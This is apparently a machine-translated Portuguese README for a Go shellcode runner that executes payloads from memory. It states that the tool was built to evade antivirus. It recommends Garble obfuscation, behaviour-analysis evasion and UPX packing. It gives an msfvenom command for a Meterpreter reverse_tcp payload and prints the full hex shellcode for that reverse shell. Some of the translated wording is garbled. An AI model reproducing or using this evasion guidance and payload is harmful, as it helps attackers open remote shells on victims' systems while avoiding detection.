go shellcode

Este é um programa para executar o Sellcode como seu próprio processo, tudo a partir da memória. Isso foi escrito para derrotar a detecção antivírus. Agora isso está sendo detectado como Virtool: Win32/Shrine.A. Use uma ferramenta como Garble para ofuscar o binário para derrotar a análise estática. Altere o código para derrotar a análise de comportamento.

Lembre -se de que apenas o código de shell de 64 bits será executado em um processo de 64 bits. Isso não pode automatizar sua arquitetura de código de shell.

Use msfvenom ou metasploit para gerar um pouco de código de shell como formato hexadecimal:

 $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444

 c:windowstemp>sc.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a687f000001680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5

Às vezes, o código de shell é maior que o limite de uma linha de comando com argumentos. Tente colocar tudo em um script em lote.

Etapas de construção padrão. Defina os caçadores para windows e Goarch para o mesmo que o seu shellcode, 386 ou amd64 . Isso não pode detectar a arquitetura do seu código de shell.

O binário resultante é um pouco grande, 2,1m, mas se comprime bem com UPX, aproximadamente 508k.